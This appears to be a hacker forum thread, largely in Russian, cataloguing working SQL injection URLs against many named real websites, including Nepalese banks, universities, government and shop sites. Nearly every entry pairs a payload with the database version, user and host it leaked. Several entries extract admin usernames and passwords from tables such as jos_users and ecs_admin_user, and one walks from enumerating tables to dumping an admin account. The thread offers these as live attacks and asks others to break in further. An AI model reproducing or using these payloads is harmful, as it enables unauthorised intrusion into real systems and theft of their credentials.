SUNRISE BANK LIMITED, NEPAL :) PR 3.
http://www.sunrisebank.com.np/news-events/details.php?id=-101+union+select+1,2,version(),4,5,6,7,8,9--
4.1.22
нашел только таблицу news. походу только посимвольным брутом колбасить.
господа, кто расковыряет - плз, отпишите в ПМ.

Еще один банк Непала.
DCBL Bank Limited. PR 4.
http://www.dcbl.com.np/news-events/details.php?id=-18+union+select+1,2,version(),4,5,6,7,8,9--
4.1.22

Tic300 PR4
http://www.megachip.ru/catalog.php?open_code=-0202+union+select+concat_ws(0x3a3a,login,password, gid)+from+mega_user+where+login=0x61646D696E+--+

http://www.ekperm.ru/main/news.php?menuid=9&section=-88+union+select+1,2,3,4,5,6,7,concat_ws(0x3a3a,use rname,user_password),9,10,11,12,13+from+phpbb_user s+limit+1,1+--+

http://ownfl.com/owner.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4,5,6,7,8,9,10,11,12,13,14,15ownfl02_ commish@localhost:ownfl02_ownfl:5.0.67-community

http://globalbiz.com.np/view_advertisements.php?id=-1+union+select+1,2,concat_Ws(0x3a,version(),user() ,database()),4,5,6,7,8,9,10,11,12--

5.0.67-community:globalbi_globprs@localhost:globalbi_mygl obal

http://www.amteore.com/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat (user_name,0x7c,password,0x7c,email),8%20from%20ec s_admin_user/*


http://www.amteore.com/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat _ws(0x3a,user(),version(),database()),8/*

root@localhost:5.0.45-community-nt-log:amteore

file_priv:Y
pr:2


godly_ecs@localhost:godly_ecs:4.0.26-standard-log
http://www.bj0808.com/mall/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat _ws(0x3a,user(),database(),version()),8/*
http://www.bj0808.com/mall/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat (user_name,0x7c,password,0x7c,email),8%20from%20ec s_admin_user/*

http://www.rendery.com/goods.php?p=good&t_id=-1+union+select+1,2,concat_Ws(0x3a,version(),user() ,database())/*

4.1.22-standard-log
rendery_root@localhost
rendery_db

http://linux-muzyka.ixion.pl/tekst.php?id=25047+and+substring(version(),1,1)=5

3-я мускуль:
http://www.lowiecki.pl/felietony/tekst.php?id=158+and+substring(version(),1,1)=3

http://www.peoplepleasure.nl/tekst.php?id=-5+union+select+1,2,concat_ws(0x3a,version(),user() ,database())
4.1.22-log:peoplepleasure@node12.cluster.nxs.nl:peopleple asure
Есть табличка: members

http://www.peoplepleasure.nl/tekst.php?id=-5+union+select+1,2,concat_ws(0x3a,version(),user() ,database())
4.1.20:magicus_2@localhost:magicus_tmp_2

http://trb-res.nl/tekst.php?id=562+and+substring(version(),1,1)=4

http://www.demo.artframe.nl/tekst.php?id=-15+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,user(),database()),7,8/*
4.1.21-standard-log:artframe_demo@localhost:artframe_demo

http://www.kralen.com/tekst.php?id=173+and+substring(version(),1,1)=4

http://www.ogledalce.co.rs/tekst.php?id=228+and+substring(version(),1,1)=5

MsSQL
http://wwwdata.forestry.oregonstate.edu/helpdesk/docs/os.php?id=1+or+1=system_userFORESTRY\IUSR_ZIRCOTEh ttp://wwwdata.forestry.oregonstate.edu/helpdesk/docs/os.php?id=1+or+1=db_name()helpdesk_dynamichttp://wwwdata.forestry.oregonstate.edu/helpdesk/docs/os.php?id=1+or+1=@@versionMicrosoft SQL Server 2005 - 9.00.3077.00 (Intel X86) Dec 17 2008 15:19:45 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

http://www.akvarijske-ribe.com/tekst.php?ID=32+and+substring(version(),1,1)=5

http://www.esmayigitoglu.nl/tekst.php?id=-3+union+select+1,2,3,4,5,concat_ws(0x3a,version(), user(),database()),7,8/*
4.1.21-standard-log:esma_db@localhost:esma_db

http://www.windsurf.nieuwetonge.com/tekst.php?id=-16+union+select+1,concat_ws(0x3a,version(),user(), database()),3
4.0.17-standard-log:nieuwetong@localhost:nieuwetong_cms

http://www.fk-stroy.ru/catalog/abc/index.php?contentId=11212+union+select+1,2,concat_ ws(0x3a,user(),database(),version()),4u99295@10.10 .153.183:u99295_fkstroy:5.0.67-log

http://www.hsabc.org/content.php?id=10+and+substring(version(),1,1)=4/*

http://festklaveret.dk/tekst.php?id=-112+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6,7,8,9,10,11,12,13
5.0.75:fk_site_data@92.61.148.10:fk_site_data

http://tantra-klub.crolink.net/tekst.php?id=1+and+substring(version(),1,1)=4

третья скуля
http://www.virtualnahercegovina.com/balkan-press/tekst.php?id=641+and+substring(version(),1,1)=3

http://www.sleepbootraaf.nl/tekst.php?id=-35+union+select+1,2,3,4,5,concat_ws(0x3a,version() ,user(),database()),7,8/*
4.1.21-standard-log:raaf_db@localhost:raaf_db

http://www.i-ceny.ru/p/?action=rubr&razdel=14&rub=140+and+substring(version(),1,1)=5

http://www.ultra.art.pl/teksty/tekst.php?kid=11&id=-12+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6

5.0.27-log:fitom_wis_b284@host-81-2-200-96.alpha.pl:fitomedic_b284

http://nerjaveem.ru/index.php?page=-1+union+select+concat_ws(0x3A,%20database(),%20ver sion(),%20user())/*&foto=2


wwwnerjaveemru
4.1.22-log
nerjavee@localhost

http://www.n-oil.by/lubrication/torg.php?id=6+and+substring(version(),1,1)=5

http://www.bg-kniga.ru/bgkniga.php?id=-5+union+select+concat_ws(0x3a,version(),user(),dat abase()),2
5.0.70-log:dbu_ansimov_1@localhost:bgkn

http://pic.ipicture.ru/uploads/090616/42451/i5VgYnfV4T.jpg

www.sevelina.com (http://sevelina.com) (http://pic.ipicture.ru/uploads/090616/42451/UM9Z59T6rb.jpg)

http://www.sevelina.com/wp-content/plugins/photoracer/viewimg.php?id=-1+union+select+0,1,2,3,4,group_concat(user_login,0 x3a,user_pass,0x3a,user_email),6,7,8+from+s_users+ limit+0,1--

http://www.kech.pl/literatura.php?id=-6+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9
5.0.66a-log:kech@localhost:kech

http://www.exkola.com.br/scripts/literatura.php?id=-457+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6,7
4.1.25-Debian_mt1-log:db19180@64.13.232.26:db19180_exkola_prod

http://www.gchk.cz/literatura.php?ID=-33+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10
4.0.31-20070605_Debian-7-log:gchk@88.86.104.68:g

http://www.gawith.nazwa.pl/literatura.php?id=3+and+substring(version(),1,1)=5

http://www.auscraftnet.com.au/directory/listing.php?cat_id=4&id=-718+UNION+SELECT+1,concat_ws(0x3a,version(),databa se(),user(),@@version_compile_os),3,4,5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43, 44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60 ,61,62


Database Version: 4.0.25-standard
Database name: auscraft_list
User name: auscraft_acn04@localhost
Os : pc-linux-gnu

http://www.cyberpunkswebsite.com/PPP/pit.php?id=3195+and+substring(version(),1,1)=4

http://www.laborresearch.org/print.php?id=391+and+substring(version(),1,1)=3

http://www.media.tas.gov.au/print.php?id=21499+and+substring(version(),1,1)=3

http://www.compudrug.com/print.php?id=8+and+substring(version(),1,1)=3
везет мне на третий мускуль сегодня

http://russian.kiev.ua/print.php?id=11603795+and+substring(version(),1,1) =5

http://www.npaact.org.au/print.php?id=-87+union+select+1,2,unhex(hex(concat_ws(0x3a,versi on(),user(),database()))),4,5,6,7,8/*
4.1.11-Debian_4sarge7:npaact@localhost:npaact

http://www.promotecraft.com.au/print.php?id=-121+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23/*
5.0.45:deb2361@localhost:promotecraft_com_au_-_ep

http://www.alexandriarealestate.com.au/properties.php?proDetails=3&property_ID=-292+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 ,32,33,34,35,36,concat_ws(0x3a,version(),database( ),user(),@@version_compile_os),38


Database Version: 4.1.22-standard-log
Database name: alexandriarealestate
User name: alexandria@localhost
OS : pc-linux-gnu

http://www.cardcontrol.com/web_DE/Produkte.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23/*dbo170234670@localhost:db170234670:4.0.27-standard

http://maps.cs-bg.info/download.php?id=-1+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),da tabase(),user(),@@version_compile_os),6,7,8,9,10/*&db=maps16&action=download

nouiit.ru - институт информационных технологий


http://www.nouiit.ru/index.php?i=10&id=7'+UNION+SELECT+1,2,3,CONCAT(0x7873716C696E6A62 6567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2 F,User(),0x7873716C696E6A656E64),5,6,7,8,9,10,11+L IMIT+1,1/*


Database Version: 4.1.22-log
Database name: db_lira_2
User name: dbu_lira_1@192.168.5.21

tvoisex.ru


http://www.tvoisex.ru/read.php?i=16'+UNION+SELECT+CONCAT(0x7873716C696E6 A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A 2A2F,User(),0x7873716C696E6A656E64),2,3,4,5,6,7,8, 9,10,11,12,13+LIMIT+1,1/*




Database Version: 4.1.21
Database name: badvertd061_db2
User name: badvertd061@localhost




artgene.co.uk


http://www.artgene.co.uk/page.php?i=-140'+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,u ser(),database(),version()),10/*



Database Version: 5.0.45
Database name: pbsportal
User name: pulse@server213-171-218-56.livedns.org.uk

multihost.ru
http://www.multihost.ru/FAQ/hosting/0%27%20UNION%20SELECT%201,2,3,concat_ws(0x20,user( ),database(),version(),@@basedir,@@datadir,@@tmpdi r,@@version_compile_os),5%20--%20-%20/
multi_mx@localhost multi_mx 5.0.67-community-log / /var/lib/mysql/ /tmp/ redhat-linux-gnu

trushop.ru


http://www.trushop.ru/item.php?i=120'+union+select+1,2,concat_ws(0x3a,us er(),database(),version()),4,5,6,7,8,9,10,11,12,13/*



Database Version: 5.0.32-Debian_7etch8-log
Database name: z101905_trus
User name: z101905_trus@77.221.130.24

mssql
[PR 6]
http://www.wehirealiens.com/employer/index.asp?id=7712+or+1=@@version--
Microsoft SQL Server 2005 - 9.00.3068.00 (X64) Feb 26 2008 23:02:54 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition (64-bit) on Windows NT 5.2 (Build 3790: Service Pack 2)
===================
[PR 3]
http://www.notodoestavisto.com/videos/index.asp?id=1494&loc=6+or+1=@@version--
Microsoft SQL Server 2005 - 9.00.4035.00 (Intel X86) Nov 24 2008 13:01:59 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
http://www.notodoestavisto.com/videos/index.asp?id=1494&loc=6+or+1=(select+system_user)--
system_user:qdx018
http://www.notodoestavisto.com/videos/index.asp?id=1494&loc=6+or+1=(select+top+1+table_name+from+informati on_schema.tables)--
http://www.notodoestavisto.com/videos/index.asp?id=1494&loc=6+or+1=(select+top+1+table_name+from+informati on_schema.tables+where+table_name+not+in+(%27Pedid osTienda%27))--
http://www.notodoestavisto.com/videos/index.asp?id=1494&loc=6+or+1=(select+top+1+table_name+from+informati on_schema.tables+where+table_name+not+in+(%27Pedid osTienda%27,%27Peliculas%27,%27GuiaTallas%27,%27Pe rsonajesAnimados%27,%27Plataformas%27,%27ItemPedid oTienda%27,%27LinksRelacionados%27,%27Webs%27,%27M ensajesPanelControlTiendas%27,%27MensajesSugerir%2 7,%27PreguntasRegistro%27,%27Noticias%27,%27Produc tos%27,%27ProductosActualidad%27,%27NoticiasBoleti n%27,%27ProductosActualidad1%27,%27VideosRedSocial %27,%27NoticiasMerchandising%27,%27ProductosColabo radores1%27,%27NumeroCapturasPorDiaErroresHttp%27, %27ComentariosBlog%27,%27NumeroVendidos%27,%27Nume roVendidosGenerado%27,%27AmpliacionesCorreccionesR edSocial%27,%27ProductosTiendas%27,%27Programas%27 ,%27Proveedores%27,%27OfertasTiendas%27,%27Reserva Ganadores%27,%27OpinionCliente%27,%27Series%27,%27 OpinionesProductos%27,%27StockMinimo%27,%27Opinion Pagina%27,%27Paises%27,%27Actores%27,%27PalabrasTa buOpinionProductos%27,%27Actrices%27,%27Tallas%27, %27PreciosAntiguosProductos%27,%27TambienComprado% 27,%27Tarifas%27,%27PreciosLienzos%27,%27AnalisisP roductos%27,%27TarifasCorreos%27,%27Anuncios%27,%2 7AmigosRedSocial%27,%27TarifasCorreosInternacional es%27,%27PreciosMarcos%27,%27AutoresComics%27,%27T arifasInternacionales%27,%27PreciosNuevosProductos %27,%27TipoLugaresBlog%27,%27PreciosNumeroFotos%27 ,%27AvisarUsuariosProductosNuevos%27,%27TipoProduc tos%27,%27Banners%27,%27TipoProductosWeb%27,%27Pre ferenciasPanelControl%27,%27BannersBoletin%27))--
===================
[PR 0]
http://www.planetpeace.ws/index.asp?id=11+or+1=@@version--
Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
http://www.planetpeace.ws/index.asp?id=11+or+1=(select+system_user)--
system_user:PPContent
http://www.planetpeace.ws/index.asp?id=11+or+1=(select+top+1+table_name+from +information_schema.tables)--

http://times.ua/search/results/?keyword=-1'+union+select+1,2,3,concat_ws(0x3a,user(),databa se(),version())/*madest@localhost:daytop:5.0.45-logДальше не рискнул...

www.tyumen.ru

http://www.tyumen.ru/?sectionid=129&catid=0&page=1&docid=799994+union+select+0,0,0,co ncat_ws(0x3a,user(),database(),version()),0,0,0 ,0,0,0--

tyumen@10.0.1.4:tyumen_site:5.0.51a-15-log

http://www.kcc.edu.np/front/newsdetail.php?id=1'+union+select+1,concat_ws(0x3a ,version(),database(),user()),3,4,5,6,7%23

5.0.51b-community-nt:kcc:kccdbusr@66.63.181.102

http://www.kcc.edu.np/front/newsdetail.php?id=1'+union+select+1,group_concat(c olumn_name),3,4,5,6,7+from+information_schema.colu mns+where+table_name=0x75736572%23

id,user_name,passwd,address,email,full_name,contac t_no

http://ftp.uceng.uc.edu/resources/collegenews/fullstory.php3?id=129'SQL
ветка 4 (((

http://www.tonybishop.com/ps.php?id=1+and+substring(version(),1,1)=5

http://www.faitalpro.com/products/schede/ps.php?id=-101030100+union+select+1,2,concat_ws(0x3a,version( ),user(),database()),4,5,6,7
5.0.32-Debian_7etch6-log:faitalpro@localhost:faitalpro

http://www.shine.edu.np/news_and_notice.php?id=-1'+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,4,5+--+

5.0.77-community:shineed_db:shineed_db@localhost

tables: countries,notice,partner_institutions,admin

####################################

http://www.united.edu.np/academy/notice.php?id=-1+union+select+1,concat_Ws(0x3a,version(),user(),d atabase()),3,4--

5.0.77-community:unitede_uniteddb@localhost:unitede_unite dedudb

http://www.metalosplav.ru/notices/?view=-561842+UNION+SELECT+0,1,2,3,4,5,6,7,8,9,10,11,conc at_ws(0x0b,us er(),version(),database()),13,14

hameleon@localhost
5.0.67-percona-highperf-b7-log
hameleon_metal

http://www.whr.org.np/event/event.php?id=-1+union+select+1,2,3,concat_Ws(0x3a,version(),data base(),user()),5,6,7--

4.1.22-standard:whrorg_whrsanwedorg:whrorg_user@localhost

http://www.disabilityconsultants.org.au/findconsultant.php?command=showbigconsultant&itemtypeid=6&consultantsid=-6+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(),da tabase(),useR(),@@version_compile_os),6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29--

Database Version: 5.0.81-community
Database name: disabili_disabilityconsultants
User name: disabili_chris@localhost
Os : pc-linux-gnu

http://www.np-icet.ru/index1.php?key=russeminars&id=-1+union+select+1,concat_Ws(0x3a,version(),database (),user()),3,4,5,6,7,8,9,10--

5.0.51:db5709j:us5709j@localhost

tables: pages_topics,news,seminars_rus,pages_additional,se minars_world,pages_index,pages_subtopics,banners

http://www.entacom.com.au/?p=catalog&c=21&s=-658+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(), database(),user(),@@version_compile_os),6,7,8,9,10 ,11,12--&v=RZ-DESTRUCTOR



Database Version: 4.1.22-standard-log
Database name: scott_entacom
User name: scott_root@localhost
Os : unknown-linux-gnu

http://www.terminators.ru/index.php?mode=5&rw_key=-1+union+select+version(),user(),data base(),@@version_compile_os/*


Database Version: 4.1.22-log
Database name: wwwterminatorsru
User name: termin03@localhost
OS: portbld-freebsd6.2

http://www.campingworld.com.au/site/products.php?prodid=-154+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,concat_ws(0x3a,version(),database(),useR(),@@ve rsion_compile_os),17,18,19,20/*&iscatid=13&issubid=32


Database Version: 4.1.22
Database name: cms_db
User name: cmsuser@localhost
Os : redhat-linux-gnu

http://itp.nyu.edu PR 6
http://itp.nyu.edu/thesis/spring2007/stream.php?movieID=1+union+select+1,2,3,4,5,concat _ws(0x3a,version(),database(),user()),7,8,9,10,11, 12,13,14/*

Database Version - 5.0.45-log
Database name - video_comments
User name - vc_update@localhost

http://mbantua[dot]com[dot]au
PR 5

http://mbantua[dot]com[dot]au/news.php?id=9999+union+select+1,concat_ws(0x3a,use r(),version(),database()),3,4,5,6,7,8,9--

user() = Mbantua_web@web3.fluidhosting.com
version() = 5.0.67-log
database() = Mbantua_website


пароль админа
http://mbantua[dot]com[dot]au/news.php?id=-55+union+select+1,concat_ws(0x3a,login,password),3 ,4,5,6,7,8,9+from+admin--

сама админка
http://mbantua[dot]com[dot]au/admin

http://www.ifr-pan.krakow.pl/main.php?lang=eng&page=akt&id=-58+UNION+SELECT+0,1,2,3,4,5,6,concat_ws(0x0b,u ser(),version(),database()),8,9+--+
kuba@localhost
5.0.68
ifr


http://www.freemarket.net.ua/index.php?reg=-15+UNION+SELECT+0,1,2,3,concat_Ws(0x0b,use r(),version(),database()),5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19+--+&page=8&cat=0&rub=0
dorosh_fuser@localhost
4.1.22-standard-log
dorosh_fm

http://www.etechnology.ru/mk.php?id=-1001+union+select+1,concat_ws(0x3a,version(),user( ),database()),3
4.0.27-log:etechnology@zvm17.host.ru:etechnology

http://www.swiss-luxury-world.ch/watches/en/watchbrands/marke/mk.php?md=405&id=-4+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4
вывод в тайтле

http://www.cmes.arizona.edu/resources/mp.php?id=-23+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31
4.0.12:cmes_web@localhost:cmes

http://www.rallyonline.pl/mp.php?1&&modex=pokaz&T[id]=-1163+union+select+1,2,concat_ws(0x3a,version(),use r(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20
5.1.30-log:mysql@localhost:rallyonline_utf

http://2b-i.co.uk/2B-me.php?id=-13+union+select+concat_ws(0x3a,version(),user(),da tabase())
5.0.67-community:ibmys0_web2bi@localhost:ibmys0_db2bi

http://confident-image.co.uk/2B-me.php?id=-32+union+select+concat_ws(0x3a,version(),user(),da tabase())
5.0.67-community:ibmys0_web2bi@localhost:ibmys0_db2bi

http://www.klara-rulikova.cz/volby-do-senatu-pisi-o-me.php?ID=-1+union+selecT+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16
5.0.51a-3ubuntu5.4-log:klararulik@uvirt2.active24.cz:klararulik

http://global-travel.mobi/hotels-my.php?id=4882+and+substring(version(),1,1)=5

http://www.latoi.com/my.php?user_id=2205&id=532+and+substring(version(),1,1)=4

http://www.tuk-tuk.com/member/my.php?id=198+and+substring(version(),1,1)=5

http://www.akademik-m.by/page.php?id=43+and+substring(version(),1,1)=5

http://www.nibulon.com/r/news.php?id=-3401518+UNION+SELECT+0,1,2,concat_ws(0x0b,user (),versio n(),database()),4,5,6,7&page=1

nibulon_31@localhost
5.0.67-0ubuntu6
nibulon_31


http://www.komsomol.com.ua/ru/index.php?s_id=products&e_id=-8+UNION+SELECT+0,1,2,3,concat_ws(0x0b,user(),v ersion(),database()),5
komsomol_alex@localhost
5.0.77-community
komsomol_komsomol

http://www.paulsmiths.edu/athletics/news.php?news_id=13'+union+select+1,2,3,4+limit+1, 1/*
User: athletics@localhost
Version: 5.0.45
Dbname: athletics_main

http://rio.edu/news/index.php?key=-1+UNION+SELECT+1,2,version(),4,5+FROM+information_ schema.tables
Version: 5.0.67

http://www.avto-tyre.ru/item_view.php?item_id=-1407+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17+from+mysql.user+--+

http://www.elmash-holding.ru/elmcatalog/item/?item_id=473+union+select+1,2,3,4,database(),6,7+/*+
elektromash

http://www.elmh.ru/elmcatalog/item/?item_id=453+union+select+1,2,3,4,version(),6,7+/*+
4.0.27-log

Tic 1000
http://www.litsovet.ru/index.php/litob.journal.view?item_id=-193+UNION+SELECT+1,2,3,concat_ws(0x3a3a,admin_logi n,admin_psw,admin_name,admin_mail),5,6,7,8,9,10,11 ,12,13,14,15+from+tbl_admin+--+
litob.journal.view?item_id=-193+UNION+SELECT+1,2,3,concat_ws(0x3a3a,admin_id,a dmin_name,admin_login,admin_password,admin_status) ,5,6,7,8,9,10,11,12,13,14,15+from+admin+--+

http://www.chelfishing.ru/links.php?t=search&search_keywords=asd&start=9999999+UNION+SELECT+1,version(),3,4,5,6,7,8 ,9,10,11,12,13/*
Powered by phpBB2
mysql version: 4.1.20

http://www.zemat.com/ru/zgr zewarki.php?id=-99999+union+select+concat_ws(ch ar(58),DATABASE(),US ER(),VERSION())--

imakorru
imakorru@localhost
5.0.51-Dotdeb_0.dotdeb.0-log

Увидел сегодня этот сайт в PHP-инъекциях. Думаю... Посмотрю: может че еще есть... Оказалось, что есть :) Да простит меня Adm1n4eG :)
http://www.govor.ru/visit/news/news_po.php?IdNews=-1+union+select+1,2,3,concat_ws(0x3a,version(),user (),database(),@@version_compile_os)/*
VERSION(): 5.0.16
USER(): govor@217.117.80.162
BAZA(): govor
OS(): portbld-freebsd6.0
http://www.govor.ru/visit/news/news_po.php?IdNews=-1+union+select+1,2,3,group_concat(table_name)+from +information_schema.tables+where+table_schema%3C%3 E0x696E666F726D6174696F6E5F736368656D61/*
Таблицы:
GAccess,GBase,GBaseImg,GHotLink,GHotel,GHotelImg,G News,GNewsImg,GPlace,GPlaceB,GSeason,GTour,GTourIm g,GType,forum,new,news
http://www.govor.ru/visit/news/news_po.php?IdNews=-1+union+select+1,2,3,group_concat(column_name)+fro m+information_schema.columns+where+table_name=0x47 416363657373/*
Колонки в таблице GAccess:
GAcId,GLog,GPass,GIP,GSet
http://www.govor.ru/visit/news/news_po.php?IdNews=-1+union+select+1,2,3,group_concat(GAcId,0x3a,GLog, 0x3a,GPass,0x3a,GIP,0x3a,GSet,0x3a)+from+GAccess/*
А вот и долгожданный админ... :)

http://www.aikidoural.ru/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a, %20%20username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/*

http://tango.net.ua/index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a, %20%20username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/*

http://avtos.su/index.php?option=com_jooget&Itemid=S@BUN&task=detail&id=-1/**/union/**/select/**/0,333,0x3a,333,222,222,222,111,111,111,0,0,0,0,0,0 %20,0,0,1,1,2,2,concat(username,0x3a,password)/**/from/**/jos_users/*


http://www.milkoff.ru/index.php?option=com_jooget&Itemid=S@BUN&task=detail&id=-1/**/union/**/select/**/0,333,0x3a,333,222,222,222,111,111,111,0,0,0,0,0,0 %20,0,0,1,1,2,2,concat(username,0x3a,password)/**/from/**/jos_users/*

http://www.suncity-travel.com/index.php?id=34+union+select+1,2,3,4,concat_ws(0x3 a,version(),database(),user()),6,7,8,9,10,11+limit +1,1/*
version():4.0.23a-log
database():suncity
user():scorp@localhost
__
http://www.mathrubhumi.org/travel/news.php?id=8935+union+select+1,2,3,4,5,concat_ws( 0x3a,version(),database(),user()),7,8,9,10,11,12,1 3,14,15,16,17,18,19
version():5.0.45
database():entravel
user():dedop@localhost
__
http://www.azores.com/travel/tour.php?id=56+union+select+1,2,3,4,5,concat_ws(0x 3a,version(),database(),user()),7,8,9,10,11,12,13, 14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,4 7++limit+1,1/*
version():5.0.45
database():azoresco
user():azoresco@localhost
__
http://soloentreamigas.com.ve/articulo.php?ID=60+union+select+1,2,3,4,5,concat_w s(0x3a,version(),database(),user()),7,8,9,10,11,12 ,13,14,15,16,17,18,19+limit+1,1/*
version():5.0.37-community-log
database():chicas
user():chicas@192.168.1.254
__
http://www.cavim.com.ve/pub.php?id=40+union+select+1,2,3,4,concat_ws(0x3a, version(),database(),user()),6,7,8,9,10,11,12,13,1 4,15,16,17,18
version():5.0.51a-community-log
database():cavimc_cavim
user():cavimc_sa@localhost
__
http://epetitions.bristol.gov.uk/petition.php?id=166+union+select+1,2,3,4,5,6,conca t_ws(0x3a,version(),database(),user()),8,9,10,11,1 2,13,14,15
version():5.0.60-log
database():bristol_epetitioner
user():epetitioner_user@localhost

http://www.sbrshop.com/store/maincategory.php?maincat_id=-1+union+select+1,username,3,4,5,6,7,8,9,10+from+us ers--

http://www.skylinechili.com/st.php?id=-8+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6
5.0.45:skyline@localhost:skyline

http://www.car-stylingparts.com/Show-St.php?id=-6+union+select+1,2,3,concat_Ws(0x3a,version(),user (),database()),5
5.0.77-community-log:carstyl_newdbs@localhost:carstyl_newcardb

http://www.norfolk.gov/News/Press/prdetails.asp?PressID=-1+UNION+SELECT+1,2,3,4,5,@@version,7,8,9,10,11--
Microsoft SQL Server 2005

http://nl.sharp.be/php/td.php?par=1108_519_no_1718+and+substring(version( ),1,1)=5

Сузуки оказывается тоже весь в sql-inj :)
http://classic.suzuki.de/code/td.php?id=-2006101+union+select+1,2,concat_ws(0x3a,version(), user(),database()),4,5,6,7,8,9,10,11/*
5.0.32-Debian_7etch5-log:suzuki@localhost:suzuki

http://www.martin-rowe.com/a.php?id=-38+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6
4.1.22:martinrowe@localhost:martin

http://www.uaz-upi.com/news/art.php?id=145+and+substring(version(),1,1)=3

http://www.endocrin.ru/art.php?id=-430+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5
4.0.27-log:endocrin@zvm12.host.ru:endocrin

http://catalogue.nimk.nl/art.php?id=7231+and+substring(version(),1,1)=5

http://www.medoded.ru/art.php?id=-72+union+select+1,2,3,4,concat_ws(0x3a,version(),u ser(),database()),6,7,8,9
5.0.32-Debian_7etch10-log:med@localhost:medoded

http://me.net.ua/art.php?id=402+and+substring(version(),1,1)=5

http://www.brownsfineart.com/gallery/art.php?ID=-77+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10
4.1.22:browns@localhost:browns_db

http://www.geopribori.ru/art.php?id=a138+and+substring(version(),1,1)=4

http://express.fa13.com/art.php?id=-17622+union+selecT+1,concat_ws(0x3a,version(),user (),database()),3,4,5,6,7,8,9,10
4.1.10a:fa13_forum@localhost:fa13_add

http://www.infoservis.net/region.php?idRegion=3+and+substring(version(),1,1) =5

http://www.propheticliving.com//index.php?option=com_directory&page=viewcat&catid=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*

http://www.shoprivergate.com//index.php?option=com_directory&page=viewcat&catid=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*

http://www.nordhouse.ru/article.php?id=-3'+UNION+SELECT+concat_Ws(0x0b,user(),versio n(),database())+--+
nordhouseru@nordhouse.ru
4.0.26
nordhouseru

http://www.38rus.com/more.php?UID=-4127+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,concat_ws(0x3a,version(),user(),database())/*

5.0.45:nia-irkutsk@localhost:38rus

http://www.astafiev.ru/topic.php?UID=-120+union+select+1,concat_ws(0x3a,version(),user() ,database())/*

5.0.45:astafiev@localhost:astafiev

http://abrionline.org/expert.php?id=-99999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,1 4,15,16,version(),18,19,20,21,22,23,24/*
Database Version: 4.0.27-max-log
Database name: ABRIDB
User name: ABRIDB@208.109.14.103

------------------------------------------------------------------------

http://www.nepaltourismdirectory.com/nepal_travel_information.php?id=-99999+union+select+1,2,version(),4,5,6,7,8--
Database Version: 5.0.77-community
Database name: ntdirectory_ntur12
User name: ntdirectory_dbnt@localhost

------------------------------------------------------------------------

http://www.sunbula.org/etemplate.php?id=-99999+union+select+1,2,3,4,version(),6,7,8,9,10,11 ,12,13,14,15,16,17,18,19/*
Database Version: 4.0.17-standard
Database name: sunbulashop
